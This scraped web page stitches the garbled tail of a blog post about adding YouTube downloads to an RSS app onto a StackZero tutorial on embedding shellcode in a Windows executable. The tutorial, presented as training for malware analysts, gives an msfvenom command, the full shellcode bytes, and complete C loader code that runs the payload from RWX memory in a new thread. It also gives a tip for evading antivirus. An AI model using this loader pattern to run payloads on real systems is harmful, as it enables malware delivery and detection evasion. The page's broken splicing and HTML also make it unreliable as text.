avatarStackZero

Free AI web copilot to create summaries, insights and extended knowledge, download it at here

3902

Abstract

only, some have video only, and some have both video and audio. And also they’re available in multiple formats. For video there is AVC (which is apparently H.254), VP09, and AV01. And for audio there’s Mp4a and Opus. I don’t know what Opus is but apparently it is noticeably better than Mp4a. So if you’ve ever gone to a YouTube download page and seen a million download options that’s why. Although I hide the redundant ones and just display the one with the lowest file size at that quality level (usually VP09 or AV01).</p><p id="b96b">It’s actually pretty cool to see AV01 as I talked about it <a href="https://readmedium.com/why-apple-adding-av1-support-is-a-big-deal-faa46a356f3c">here</a>. And it does compress videos a little better than VP09 and a lot better than AVC.</p><p id="d170">Also apparently YouTube does something called DRC, dynamic range compression (Not Democratic Republic of Congo). It makes the quiet sections louder and the loud sections quieter. Apparently people really hate it and I guess there must be a way to disable it because I have not been able to find a music video with DRC enabled. I’ve never heard anyone talk about this before though.</p><p id="e027">So now that we have the formats we can just download them. Each format has a download link oddly enough. I did not expect that. Just keep in mind that the YouTube download links expire in 6 hours.</p><p id="3fc9">Of course here we run into a problem. When I saw this I was like, “Great, let’s just download an audio-only track if we only want audio or a video+audio track if we want video.”</p> <figure id="dd49"> <div> <div> <img class="ratio" src="http://placehold.it/16x9"> <iframe class="" src="https://cdn.embedly.com/widgets/media.html?src=https%3A%2F%2Fgiphy.com%2Fembed%2FMvioOPqhOm6b4BI0FQ%2Ftwitter%2Fiframe&amp;display_name=Giphy&amp;url=https%3A%2F%2Fgiphy.com%2Fgifs%2Ffallontonight-jimmy-fallon-tonight-show-MvioOPqhOm6b4BI0FQ&amp;image=https%3A%2F%2Fmedia0.giphy.com%2Fmedia%2Fv1.Y2lkPTc5MGI3NjExa203NTd1dnVhNGpveHByMmxsOGRzZGxsejhsZzh2Zjk5N20xMTYwbSZlcD12MV9pbnRlcm5hbF9naWZfYnlfaWQmY3Q9Zw%2FMvioOPqhOm6b4BI0FQ%2Fgiphy.gif&amp;key=a19fcc184b9711e1b4764040d3dc5c07&amp;type=text%2Fhtml&amp;schema=giphy" allowfullscreen="" frameborder="0" height="435" width="435"> </div> </div> </figure></iframe></div></div></figure><p id="9eda">If you do that you’re restricted to at most 720p 30fps. Or so I’m told. I haven’t been able to find a file with both video and audio over 360p. And some videos don’t have any video+audio tracks at all. So that means we’re going to have to download a video file and an audio file (preferably without DRC) and merge them together.</p><p id="e01b">And this is perhaps the first really big problem I ran into. If I was doing this locally it would not be that big of a problem because there’s a nice command line package called <code>FFmpeg</code> that will just do it for you. Unfortunately it’s a bit more complicated when you’re working with Node.js because you have to do a bunch of file manipulation stuff.</p><p id="12d8">I ended up deciding to just download the files from Google’s servers separately and then merge them locally. Apparently Flutter has a package called <code>FFmpeg-kit</code> that will do this. Unfortunately it only works on Android, iOS, and MacOS.</p><p id="fdbf">Although Android will not be getting YouTube downloading because Google is really strict about that.</p> <figure id="eaa2"> <div> <div> <img class="ratio" src="http://placehold.it/16x9"> <iframe class="" src="https://cdn.embedly.com/widgets/media.html?type=text%2Fhtml&amp;key=a19fcc184b9711e1b4764040d3dc5c07&amp;schema=twitter&amp;url=https%3A//twitter.com/EzraDuown/status/1776352074449530961/&amp;image=" a

Options

llowfullscreen="" frameborder="0" height="281" width="500"> </div> </div> </figure></iframe></div></div></figure><p id="7c7c">In fact the app mentioned above, NewPipe, is not available on the Google Play store. So that means that the only platform able to benefit from YouTube downloading is iOS. There is no macOS version of the app but you can run the iOS app on an Apple Silicon Mac. Web users will be restricted to downloading audio or downloading 360p videos. Oh well. Maybe I’ll improve this feature in the future.</p><p id="cae5">And another problem. YouTube throttles some of the downloads. Not all of them though which is weird. I thought it was broken at first. Nope, it’s just that the downloads were really really slow.</p><p id="74fe">Although there’s a way around this too. Flutter has its own package for downloading YouTube videos called <code>youtube_explode_dart</code> and this one has gotten around the throttling issues. It’s listed as issue #180 and fixed in pull request 185.</p><figure id="c76e"><img src="https://cdn-images-1.readmedium.com/v2/resize:fit:800/1*R0QbSVVKcpNt1NDnlL-7Qg.png"><figcaption></figcaption></figure><p id="4a2c">And it works great now. Well, for the streams it supports. It doesn’t support all the streams. But it supports enough.</p><p id="7308">And, one more thing <code>youtube_explode_dart</code> doesn’t actually do everything <code>youtube-dl</code> does. <code>youtube-dl</code> actually gives you a lot more information on the actual files (such as if the audio is DRCed). So I’m still going to have to use it. But I can use <code>youtube_explode_dart</code> to actually download the files.</p><p id="8fe6">I do feel a little silly for wasting so much time on this feature. Like, I built an RSS reader to watch YouTube videos, not to download them. And the only people that can really take advantage of this feature are iOS users.</p><p id="9388">It’s funny. Everyone thinks iOS is the locked-down one. But in this one specific case Android is more locked down. Because if you look up YouTube downloaders on iOS there are pages and pages of them.</p><p id="0e6e">I could see myself taking advantage of this feature. Stratum 3.0.0 also introduces the ability to add external links. So I could find a YouTube video I like that I want to download and I could just download it.</p><p id="01c9">And this experience has taught me a lot about the inner workings of YouTube. Mostly the subtitles. I had no idea the method I was using to get subtitles before was so suboptimal. It works and there’s nothing wrong with it but it could be better.</p><p id="7e7d">I’m pretty happy with Stratum’s YouTube functionality now. I was happy with it before, to be honest, I just went down a ‘YouTube Rabbit Hole’. But I did have one more feature planned: automatic YouTube summary generation.</p><p id="5b0e">Because since adding YouTube summaries I’ve been watching a lot more YouTube. I mean summarizing a lot more YouTube. There are a lot of channels I’m interested in but can’t get to due to time restrictions. Like TED and DW News. Guess what? I follow both of those sources of news now and just read the summaries. But you know what I don’t like? Tapping on the button to generate the summaries.</p><p id="8a38">Well, those are some future plans. It will be expensive though, which is also why I’m planning to announce new pricing for Stratum soon.</p><p id="f6db">If you liked this post and would like to stay updated with my future articles consider using my RSS app Stratum on <a href="https://apple.co/3rZyh9B">iOS</a> and <a href="https://play.google.com/store/apps/details?id=com.amorfatite.keystone">Android</a>. Also check out my language learning app Litany (<a href="https://apple.co/45prCDA">iOS</a>, <a href="https://play.google.com/store/apps/details?id=com.amorfatite.litany">Android</a>).</p></article></body>

How to embed shellcode payload into an executable quickly — StackZero

Introduction

A good malware analyst has to know how to embed shellcode payload into an executable in just a few minutes, is the best way to recognize it during an analysis.

Trojans or, more generally, some malware often embed shellcode within their code, in particular, some attacker can hide it within sections:

In this article we will see how it is possible to do this, in practice, with regard to the first two sections. The code will only have an explanatory function, a malware developer will pay a lot more attention for example to avoid being “discovered” by an anti-malware.

Prerequisites

To begin with, we need a Windows machine and a Linux machine. For this purpose I will use two virtual machines in virtualbox. - Kali linux - Flare VM (Windows 7 Ultimate x64)

Shellcode Generation

The malware we are going to write is totally harmless, and the final result will be simply the launch of calc.exe (usually for proof of concept in windows we can launch either calc.exe or notepad.exe).

The first step is to generate the shellcode, for this we will use msfvenom with our Kali linux machine.

$ msfvenom -p windows/x64/exec --format c CMD=calc.exe EXITFUNC=thread

Let’s analyze the options:

  • -p windows/x64/exec indicates that we are asking to launch the exec payload.
  • -format c asks that the shellcode is formatted for the c language.
  • CMD=’calc.exe’ is a payload option and asks what command to run.
  • EXITFUNC=thread another payload option, in this case it is the function to call at the end of the execution of the shellcode, specifying ‘thread’ will execute ‘ExitThread’.

This command will output the following shellcode:

unsigned char buf[] = "\xeb\x27\x5b\x53\x5f\xb0\xb0\xfc\xae\x75\xfd\x57\x59\x53\x5e" "\x8a\x06\x30\x07\x48\xff\xc7\x48\xff\xc6\x66\x81\x3f\xd8\xcd" "\x74\x07\x80\x3e\xb0\x75\xea\xeb\xe6\xff\xe1\xe8\xd4\xff\xff" "\xff\x07\xb0\xfb\x4f\x84\xe3\xf7\xef\xc7\x07\x07\x07\x46\x56" "\x46\x57\x55\x56\x51\x4f\x36\xd5\x62\x4f\x8c\x55\x67\x4f\x8c" "\x55\x1f\x4f\x8c\x55\x27\x4f\x8c\x75\x57\x4f\x08\xb0\x4d\x4d" "\x4a\x36\xce\x4f\x36\xc7\xab\x3b\x66\x7b\x05\x2b\x27\x46\xc6" "\xce\x0a\x46\x06\xc6\xe5\xea\x55\x46\x56\x4f\x8c\x55\x27\x8c" "\x45\x3b\x4f\x06\xd7\x8c\x87\x8f\x07\x07\x07\x4f\x82\xc7\x73" "\x60\x4f\x06\xd7\x57\x8c\x4f\x1f\x43\x8c\x47\x27\x4e\x06\xd7" "\xe4\x51\x4f\xf8\xce\x46\x8c\x33\x8f\x4f\x06\xd1\x4a\x36\xce" "\x4f\x36\xc7\xab\x46\xc6\xce\x0a\x46\x06\xc6\x3f\xe7\x72\xf6" "\x4b\x04\x4b\x23\x0f\x42\x3e\xd6\x72\xdf\x5f\x43\x8c\x47\x23" "\x4e\x06\xd7\x61\x46\x8c\x0b\x4f\x43\x8c\x47\x1b\x4e\x06\xd7" "\x46\x8c\x03\x8f\x4f\x06\xd7\x46\x5f\x46\x5f\x59\x5e\x5d\x46" "\x5f\x46\x5e\x46\x5d\x4f\x84\xeb\x27\x46\x55\xf8\xe7\x5f\x46" "\x5e\x5d\x4f\x8c\x15\xee\x50\xf8\xf8\xf8\x5a\x4f\xbd\x06\x07" "\x07\x07\x07\x07\x07\x07\x4f\x8a\x8a\x06\x06\x07\x07\x46\xbd" "\x36\x8c\x68\x80\xf8\xd2\xbc\xe7\x1a\x2d\x0d\x46\xbd\xa1\x92" "\xba\x9a\xf8\xd2\x4f\x84\xc3\x2f\x3b\x01\x7b\x0d\x87\xfc\xe7" "\x72\x02\xbc\x40\x14\x75\x68\x6d\x07\x5e\x46\x8e\xdd\xf8\xd2" "\x64\x66\x6b\x64\x29\x62\x7f\x62\x07\xd8\xcd";

Now save the output and move to your Windows machine on our VisualStudio editor.

Embed shellcode payload into an executable

The first step includes importing the necessary libraries:

#include <windows.h> 
#include <stdio.h> 
#include <string.h> 
#include <stdlib.h>

Next we will declare the variables we need and initialise the array containing the shellcode.

void * shellcode_alloc_mem ; 
HANDLE threadHandle; 
unsigned char shellcode[]= 
"\xeb\x27\x5b\x53\x5f\xb0\xb0\xfc\xae\x75\xfd\x57\x59\x53\x5e" 
"\x8a\x06\x30\x07\x48\xff\xc7\x48\xff\xc6\x66\x81\x3f\xd8\xcd" "\x74\x07\x80\x3e\xb0\x75\xea\xeb\xe6\xff\xe1\xe8\xd4\xff\xff" "\xff\x07\xb0\xfb\x4f\x84\xe3\xf7\xef\xc7\x07\x07\x07\x46\x56" "\x46\x57\x55\x56\x51\x4f\x36\xd5\x62\x4f\x8c\x55\x67\x4f\x8c" "\x55\x1f\x4f\x8c\x55\x27\x4f\x8c\x75\x57\x4f\x08\xb0\x4d\x4d" "\x4a\x36\xce\x4f\x36\xc7\xab\x3b\x66\x7b\x05\x2b\x27\x46\xc6" "\xce\x0a\x46\x06\xc6\xe5\xea\x55\x46\x56\x4f\x8c\x55\x27\x8c" "\x45\x3b\x4f\x06\xd7\x8c\x87\x8f\x07\x07\x07\x4f\x82\xc7\x73" "\x60\x4f\x06\xd7\x57\x8c\x4f\x1f\x43\x8c\x47\x27\x4e\x06\xd7" "\xe4\x51\x4f\xf8\xce\x46\x8c\x33\x8f\x4f\x06\xd1\x4a\x36\xce" "\x4f\x36\xc7\xab\x46\xc6\xce\x0a\x46\x06\xc6\x3f\xe7\x72\xf6" "\x4b\x04\x4b\x23\x0f\x42\x3e\xd6\x72\xdf\x5f\x43\x8c\x47\x23" "\x4e\x06\xd7\x61\x46\x8c\x0b\x4f\x43\x8c\x47\x1b\x4e\x06\xd7" "\x46\x8c\x03\x8f\x4f\x06\xd7\x46\x5f\x46\x5f\x59\x5e\x5d\x46" "\x5f\x46\x5e\x46\x5d\x4f\x84\xeb\x27\x46\x55\xf8\xe7\x5f\x46" "\x5e\x5d\x4f\x8c\x15\xee\x50\xf8\xf8\xf8\x5a\x4f\xbd\x06\x07" "\x07\x07\x07\x07\x07\x07\x4f\x8a\x8a\x06\x06\x07\x07\x46\xbd" "\x36\x8c\x68\x80\xf8\xd2\xbc\xe7\x1a\x2d\x0d\x46\xbd\xa1\x92" "\xba\x9a\xf8\xd2\x4f\x84\xc3\x2f\x3b\x01\x7b\x0d\x87\xfc\xe7" "\x72\x02\xbc\x40\x14\x75\x68\x6d\x07\x5e\x46\x8e\xdd\xf8\xd2" "\x64\x66\x6b\x64\x29\x62\x7f\x62\x07\xd8\xcd"; 
unsigned int shellcode_len = sizeof(shellcode)/sizeof(unsigned char);

After all this steps, we will allocate an area of memory in which to insert the shellcode. The prototype of the function is this:

LPVOID VirtualAlloc( 
    LPVOID lpAddress,
    SIZE_T dwSize, 
    DWORD flAllocationType, 
    DWORD flProtect );

We will then let the system decide where to allocate the bytes corresponding to the length of the shellcode with all permissions.

shellcode_alloc_mem = VirtualAlloc(0, shellcode_len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE );

Those functions/macros can help us:

The code needs a little comment, RtlMoveMemory is quite simple, it takes as parameters source, destination and length, and then moves the specified number of bytes from the source to the destination. CreateThread receives as third parameter the routine, which will be our shellcode, all cast to LPTHREAD_START_ROUTINE. WaitForSingleObject instead waits for the end of the thread.

I don’t want to add more elements, before showing the complete code I wanted to specify that normally an antivirus will label as suspicious threads that have full permissions, so what malware developers usually do is to allocate with permissions PAGE_READWRITE, copy the shellcode and then use the VirtualProtect function and change the permissions to PAGE_EXECUTE_READ.

But now let’s see the complete code:

#include <windows.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main(void)
{
    void * shellcode_alloc_mem ;
HANDLE threadHandle;
unsigned char shellcode[]=
"\xeb\x27\x5b\x53\x5f\xb0\xb0\xfc\xae\x75\xfd\x57\x59\x53\x5e"
"\x8a\x06\x30\x07\x48\xff\xc7\x48\xff\xc6\x66\x81\x3f\xd8\xcd"
"\x74\x07\x80\x3e\xb0\x75\xea\xeb\xe6\xff\xe1\xe8\xd4\xff\xff"
"\xff\x07\xb0\xfb\x4f\x84\xe3\xf7\xef\xc7\x07\x07\x07\x46\x56"
"\x46\x57\x55\x56\x51\x4f\x36\xd5\x62\x4f\x8c\x55\x67\x4f\x8c"
"\x55\x1f\x4f\x8c\x55\x27\x4f\x8c\x75\x57\x4f\x08\xb0\x4d\x4d"
"\x4a\x36\xce\x4f\x36\xc7\xab\x3b\x66\x7b\x05\x2b\x27\x46\xc6"
"\xce\x0a\x46\x06\xc6\xe5\xea\x55\x46\x56\x4f\x8c\x55\x27\x8c"
"\x45\x3b\x4f\x06\xd7\x8c\x87\x8f\x07\x07\x07\x4f\x82\xc7\x73"
"\x60\x4f\x06\xd7\x57\x8c\x4f\x1f\x43\x8c\x47\x27\x4e\x06\xd7"
"\xe4\x51\x4f\xf8\xce\x46\x8c\x33\x8f\x4f\x06\xd1\x4a\x36\xce"
"\x4f\x36\xc7\xab\x46\xc6\xce\x0a\x46\x06\xc6\x3f\xe7\x72\xf6"
"\x4b\x04\x4b\x23\x0f\x42\x3e\xd6\x72\xdf\x5f\x43\x8c\x47\x23"
"\x4e\x06\xd7\x61\x46\x8c\x0b\x4f\x43\x8c\x47\x1b\x4e\x06\xd7"
"\x46\x8c\x03\x8f\x4f\x06\xd7\x46\x5f\x46\x5f\x59\x5e\x5d\x46"
"\x5f\x46\x5e\x46\x5d\x4f\x84\xeb\x27\x46\x55\xf8\xe7\x5f\x46"
"\x5e\x5d\x4f\x8c\x15\xee\x50\xf8\xf8\xf8\x5a\x4f\xbd\x06\x07"
"\x07\x07\x07\x07\x07\x07\x4f\x8a\x8a\x06\x06\x07\x07\x46\xbd"
"\x36\x8c\x68\x80\xf8\xd2\xbc\xe7\x1a\x2d\x0d\x46\xbd\xa1\x92"
"\xba\x9a\xf8\xd2\x4f\x84\xc3\x2f\x3b\x01\x7b\x0d\x87\xfc\xe7"
"\x72\x02\xbc\x40\x14\x75\x68\x6d\x07\x5e\x46\x8e\xdd\xf8\xd2"
"\x64\x66\x6b\x64\x29\x62\x7f\x62\x07\xd8\xcd";
unsigned int shellcode_len = sizeof(shellcode)/sizeof(unsigned char);
    
    shellcode_alloc_mem = VirtualAlloc(0, shellcode_len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE );
getchar();
    if(shellcode_alloc_mem )
    {   
        RtlMoveMemory(shellcode_alloc_mem, shellcode, shellcode_len);
        threadHandle = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)shellcode_alloc_mem, 0, 0, 0);
        WaitForSingleObject(threadHandle, INFINITE);
    }
}

In this case our shellcode is inside the .text section, to make it in the .data section simply move our variable to global, exactly as I show in this example.

#include <windows.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
unsigned char shellcode[]=
"\xeb\x27\x5b\x53\x5f\xb0\xb0\xfc\xae\x75\xfd\x57\x59\x53\x5e"
"\x8a\x06\x30\x07\x48\xff\xc7\x48\xff\xc6\x66\x81\x3f\xd8\xcd"
"\x74\x07\x80\x3e\xb0\x75\xea\xeb\xe6\xff\xe1\xe8\xd4\xff\xff"
"\xff\x07\xb0\xfb\x4f\x84\xe3\xf7\xef\xc7\x07\x07\x07\x46\x56"
"\x46\x57\x55\x56\x51\x4f\x36\xd5\x62\x4f\x8c\x55\x67\x4f\x8c"
"\x55\x1f\x4f\x8c\x55\x27\x4f\x8c\x75\x57\x4f\x08\xb0\x4d\x4d"
"\x4a\x36\xce\x4f\x36\xc7\xab\x3b\x66\x7b\x05\x2b\x27\x46\xc6"
"\xce\x0a\x46\x06\xc6\xe5\xea\x55\x46\x56\x4f\x8c\x55\x27\x8c"
"\x45\x3b\x4f\x06\xd7\x8c\x87\x8f\x07\x07\x07\x4f\x82\xc7\x73"
"\x60\x4f\x06\xd7\x57\x8c\x4f\x1f\x43\x8c\x47\x27\x4e\x06\xd7"
"\xe4\x51\x4f\xf8\xce\x46\x8c\x33\x8f\x4f\x06\xd1\x4a\x36\xce"
"\x4f\x36\xc7\xab\x46\xc6\xce\x0a\x46\x06\xc6\x3f\xe7\x72\xf6"
"\x4b\x04\x4b\x23\x0f\x42\x3e\xd6\x72\xdf\x5f\x43\x8c\x47\x23"
"\x4e\x06\xd7\x61\x46\x8c\x0b\x4f\x43\x8c\x47\x1b\x4e\x06\xd7"
"\x46\x8c\x03\x8f\x4f\x06\xd7\x46\x5f\x46\x5f\x59\x5e\x5d\x46"
"\x5f\x46\x5e\x46\x5d\x4f\x84\xeb\x27\x46\x55\xf8\xe7\x5f\x46"
"\x5e\x5d\x4f\x8c\x15\xee\x50\xf8\xf8\xf8\x5a\x4f\xbd\x06\x07"
"\x07\x07\x07\x07\x07\x07\x4f\x8a\x8a\x06\x06\x07\x07\x46\xbd"
"\x36\x8c\x68\x80\xf8\xd2\xbc\xe7\x1a\x2d\x0d\x46\xbd\xa1\x92"
"\xba\x9a\xf8\xd2\x4f\x84\xc3\x2f\x3b\x01\x7b\x0d\x87\xfc\xe7"
"\x72\x02\xbc\x40\x14\x75\x68\x6d\x07\x5e\x46\x8e\xdd\xf8\xd2"
"\x64\x66\x6b\x64\x29\x62\x7f\x62\x07\xd8\xcd"
int main(void)
{
    void * shellcode_alloc_mem ;
HANDLE threadHandle;
;
unsigned int shellcode_len = sizeof(shellcode)/sizeof(unsigned char);
    
    shellcode_alloc_mem = VirtualAlloc(0, shellcode_len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE );
getchar();
    if(shellcode_alloc_mem )
    {   
        RtlMoveMemory(shellcode_alloc_mem, shellcode, shellcode_len);
        threadHandle = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)shellcode_alloc_mem, 0, 0, 0);
        WaitForSingleObject(threadHandle, INFINITE);
    }
}

And finally, let’s see the command to compile, to be run in the x64 Native Tools command prompt.

At this point, when running, you should have a paused terminal, and on key pressing a thread will be launched and the shellcode executed. I suggest analysing the behaviour using a debugger such as xdbg.

Further Readings

If you found it interesting to read, I recommend the following articles.

Originally published at https://www.stackzero.net on September 30, 2021.

Shellcode
C Programming
Hacking
Ethical Hacking
Malware
Recommended from ReadMedium